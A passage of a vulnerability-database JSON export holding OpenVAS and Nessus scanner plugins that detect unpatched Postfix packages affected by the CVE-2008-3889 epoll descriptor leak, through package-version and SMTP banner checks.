General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A memory leak in Postfix might allow local users to cause a Denial of\nService.\";\ntag_solution = \"All Postfix 2.4 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=mail-mta/postfix-2.4.9'\n\nAll Postfix 2.5 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=mail-mta/postfix-2.5.5'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200809-09\nhttp://bugs.gentoo.org/show_bug.cgi?id=236453\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200809-09.\";\n\n \n\nif(description)\n{\n script_id(61646);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2008-3889\");\n script_tag(name:\"cvss_base\", value:\"2.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Gentoo Security Advisory GLSA 200809-09 (postfix)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"mail-mta/postfix\", unaffected: make_list(\"ge 2.4.9\", \"ge 2.5.5\"), vulnerable: make_list(\"lt 2.4.9\", \"lt 2.5.5\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:56:11", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3889"], "description": "Check for the Version of postfix", "modified": "2017-07-06T00:00:00", "published": "2009-04-09T00:00:00", "id": "OPENVAS:830635", "href": "http://plugins.openvas.org/nasl.php?oid=830635", "type": "openvas", "title": "Mandriva Update for postfix MDVSA-2008:190 (postfix)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for postfix MDVSA-2008:190 (postfix)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability in Postfix 2.4 and later was discovered, when\n running on Linux kernel 2.6, where a local user could cause a denial\n of service due to Postfix leaking the epoll file descriptor when\n executing non-Postfix commands (CVE-2008-3889).\n\n The updated packages have been patched to correct this issue.\";\n\ntag_affected = \"postfix on Mandriva Linux 2008.0,\n Mandriva Linux 2008.0/X86_64,\n Mandriva Linux 2008.1,\n Mandriva Linux 2008.1/X86_64\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2008-09/msg00007.php\");\n script_id(830635);\n script_version(\"$Revision: 6568 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:04:21 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-09 14:26:37 +0200 (Thu, 09 Apr 2009)\");\n script_tag(name:\"cvss_base\", value:\"2.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"MDVSA\", value: \"2008:190\");\n script_cve_id(\"CVE-2008-3889\");\n script_name( \"Mandriva Update for postfix MDVSA-2008:190 (postfix)\");\n\n script_summary(\"Check for the Version of postfix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2008.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libpostfix1\", rpm:\"libpostfix1~2.4.5~2.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix\", rpm:\"postfix~2.4.5~2.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-ldap\", rpm:\"postfix-ldap~2.4.5~2.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-mysql\", rpm:\"postfix-mysql~2.4.5~2.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-pcre\", rpm:\"postfix-pcre~2.4.5~2.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-pgsql\", rpm:\"postfix-pgsql~2.4.5~2.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64postfix1\", rpm:\"lib64postfix1~2.4.5~2.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2008.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"libpostfix1\", rpm:\"libpostfix1~2.5.1~2.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix\", rpm:\"postfix~2.5.1~2.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-ldap\", rpm:\"postfix-ldap~2.5.1~2.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-mysql\", rpm:\"postfix-mysql~2.5.1~2.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-pcre\", rpm:\"postfix-pcre~2.5.1~2.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-pgsql\", rpm:\"postfix-pgsql~2.5.1~2.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64postfix1\", rpm:\"lib64postfix1~2.5.1~2.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:56:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3889", "CVE-2008-2937", "CVE-2008-2936"], "description": "Check for the Version of postfix", "modified": "2017-07-10T00:00:00", "published": "2009-02-17T00:00:00", "id": "OPENVAS:860419", "href": "http://plugins.openvas.org/nasl.php?oid=860419", "type": "openvas", "title": "Fedora Update for postfix FEDORA-2008-8595", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for postfix FEDORA-2008-8595\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"postfix on Fedora 8\";\ntag_insight = \"Postfix is a Mail Transport Agent (MTA), supporting LDAP, SMTP AUTH (SASL),\n TLS\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/fedora-package-announce/2008-October/msg00271.html\");\n script_id(860419);\n script_version(\"$Revision: 6623 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:10:20 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-17 17:05:11 +0100 (Tue, 17 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"6.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2008-8595\");\n script_cve_id(\"CVE-2008-2936\", \"CVE-2008-2937\", \"CVE-2008-3889\");\n script_name( \"Fedora Update for postfix FEDORA-2008-8595\");\n\n script_summary(\"Check for the Version of postfix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC8\")\n{\n\n if ((res = isrpmvuln(pkg:\"postfix\", rpm:\"postfix~2.5.5~1.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3889", "CVE-2008-2937", "CVE-2008-2936"], "description": "Check for the Version of postfix", "modified": "2017-07-10T00:00:00", "published": "2009-02-17T00:00:00", "id": "OPENVAS:860510", "href": "http://plugins.openvas.org/nasl.php?oid=860510", "type": "openvas", "title": "Fedora Update for postfix FEDORA-2008-8593", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for postfix FEDORA-2008-8593\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"postfix on Fedora 9\";\ntag_insight = \"Postfix is a Mail Transport Agent (MTA), supporting LDAP, SMTP AUTH (SASL),\n TLS\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/fedora-package-announce/2008-October/msg00287.html\");\n script_id(860510);\n script_version(\"$Revision: 6623 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:10:20 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-17 17:05:11 +0100 (Tue, 17 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"6.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2008-8593\");\n script_cve_id(\"CVE-2008-2936\", \"CVE-2008-2937\", \"CVE-2008-3889\");\n script_name( \"Fedora Update for postfix FEDORA-2008-8593\");\n\n script_summary(\"Check for the Version of postfix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC9\")\n{\n\n if ((res = isrpmvuln(pkg:\"postfix\", rpm:\"postfix~2.5.5~1.fc9\", rls:\"FC9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-01-01T04:55:04", "description": "According to its banner, the version of Postfix running on the remote\nhost leaks 'epoll' file descriptors when it executes non-Postfix\ncommands from, say, a user's .forward file. A local attacker can\naccess the leaked epoll descriptor to launch a denial of service\nattack against Postfix.\n\nNote that this issue only affects hosts running Linux with a 2.6\nkernel.", "edition": 25, "published": "2008-10-06T00:00:00", "title": "Postfix epoll File Descriptor Leak Local DoS", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3889"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:postfix:postfix"], "id": "POSTFIX_EPOLL_LOCAL_DOS.NASL", "href": "https://www.tenable.com/plugins/nessus/34347", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(34347);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/11/15 20:50:24\");\n\n script_cve_id(\"CVE-2008-3889\");\n script_bugtraq_id(30977);\n\n script_name(english:\"Postfix epoll File Descriptor Leak Local DoS\");\n script_summary(english:\"Checks the version of the remote Postfix daemon\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote mail server is vulnerable to a local denial of service\nattack.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of Postfix running on the remote\nhost leaks 'epoll' file descriptors when it executes non-Postfix\ncommands from, say, a user's .forward file. A local attacker can\naccess the leaked epoll descriptor to launch a denial of service\nattack against Postfix.\n\nNote that this issue only affects hosts running Linux with a 2.6\nkernel.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/495894/100/0/threaded\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Postfix 2.4.9 / 2.5.5 / 2.6-20080902 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/10/06\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:postfix:postfix\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(english:\"This script is Copyright (C) 2008-2018 Tenable Network Security, Inc.\");\n\n script_family(english:\"SMTP problems\");\n\n script_dependencie(\"smtpscan.nasl\", \"smtpserver_detect.nasl\", \"os_fingerprint.nasl\");\n script_require_keys(\"Host/OS\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/smtp\", 25, 587);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"smtp_func.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nos = get_kb_item(\"Host/OS\");\nif (\"Linux Kernel 2.6\" >!< os) exit(0);\n\nport = get_kb_item(\"Services/smtp\");\nif (!port) port = 25;\n\nbanner = get_smtp_banner(port: port);\nif (! banner) exit(0);\n\n# Some banners look like: Postfix ... on Linux 2.4.20\n# So we have to be strict\nif (egrep(string: banner, pattern: \" ESMTP Postfix +\\(?(2\\.4\\.[0-8]|2\\.5\\.[^0-4]|2\\.6-2008(0[0-8]|0901))[^0-9]\"))\n security_note(port);\n", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-07T11:51:56", "description": "A vulnerability in Postfix 2.4 and later was discovered, when running\non Linux kernel 2.6, where a local user could cause a denial of\nservice due to Postfix leaking the epoll file descriptor when\nexecuting non-Postfix commands (CVE-2008-3889).\n\nThe updated packages have been patched to correct this issue.", "edition": 24, "published": "2009-04-23T00:00:00", "title": "Mandriva Linux Security Advisory : postfix (MDVSA-2008:190)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3889"], "modified": "2009-04-23T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:postfix-pcre", "cpe:/o:mandriva:linux:2008.1", "p-cpe:/a:mandriva:linux:postfix-pgsql", "cpe:/o:mandriva:linux:2008.0", "p-cpe:/a:mandriva:linux:postfix", "p-cpe:/a:mandriva:linux:libpostfix1", "p-cpe:/a:mandriva:linux:postfix-mysql", "p-cpe:/a:mandriva:linux:lib64postfix1", "p-cpe:/a:mandriva:linux:postfix-ldap"], "id": "MANDRIVA_MDVSA-2008-190.NASL", "href": "https://www.tenable.com/plugins/nessus/36736", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2008:190. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(36736);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2008-3889\");\n script_xref(name:\"MDVSA\", value:\"2008:190\");\n\n script_name(english:\"Mandriva Linux Security Advisory : postfix (MDVSA-2008:190)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability in Postfix 2.4 and later was discovered, when running\non Linux kernel 2.6, where a local user could cause a denial of\nservice due to Postfix leaking the epoll file descriptor when\nexecuting non-Postfix commands (CVE-2008-3889).\n\nThe updated packages have been patched to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.postfix.org/announcements/20080902.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:N/A:P\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64postfix1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libpostfix1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:postfix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:postfix-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:postfix-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:postfix-pcre\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:postfix-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2008.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2008.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/09/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/04/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64postfix1-2.4.5-2.2mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libpostfix1-2.4.5-2.2mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"postfix-2.4.5-2.2mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"postfix-ldap-2.4.5-2.2mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"postfix-mysql-2.4.5-2.2mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"postfix-pcre-2.4.5-2.2mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"postfix-pgsql-2.4.5-2.2mdv2008.0\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2008.1\", cpu:\"x86_64\", reference:\"lib64postfix1-2.5.1-2.2mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"i386\", reference:\"libpostfix1-2.5.1-2.2mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"postfix-2.5.1-2.2mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"postfix-ldap-2.5.1-2.2mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"postfix-mysql-2.5.1-2.2mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"postfix-pcre-2.5.1-2.2mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"postfix-pgsql-2.5.1-2.2mdv2008.1\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-17T14:46:57", "description": "When exectuting external programs postfix didn't close the file\ndescriptor of the epoll system call. This could potentially be\nexploited to shutdown postfix (CVE-2008-3889).", "edition": 24, "published": "2008-09-18T00:00:00", "title": "openSUSE 10 Security Update : postfix (postfix-5603)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3889"], "modified": "2008-09-18T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:postfix-devel", "p-cpe:/a:novell:opensuse:postfix-mysql", "cpe:/o:novell:opensuse:10.3", "p-cpe:/a:novell:opensuse:postfix-postgresql", "p-cpe:/a:novell:opensuse:postfix"], "id": "SUSE_POSTFIX-5603.NASL", "href": "https://www.tenable.com/plugins/nessus/34240", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update postfix-5603.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(34240);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-3889\");\n\n script_name(english:\"openSUSE 10 Security Update : postfix (postfix-5603)\");\n script_summary(english:\"Check for the postfix-5603 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"When exectuting external programs postfix didn't close the file\ndescriptor of the epoll system call. This could potentially be\nexploited to shutdown postfix (CVE-2008-3889).\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected postfix packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:N/A:P\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:postfix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:postfix-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:postfix-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:postfix-postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/09/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/09/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif 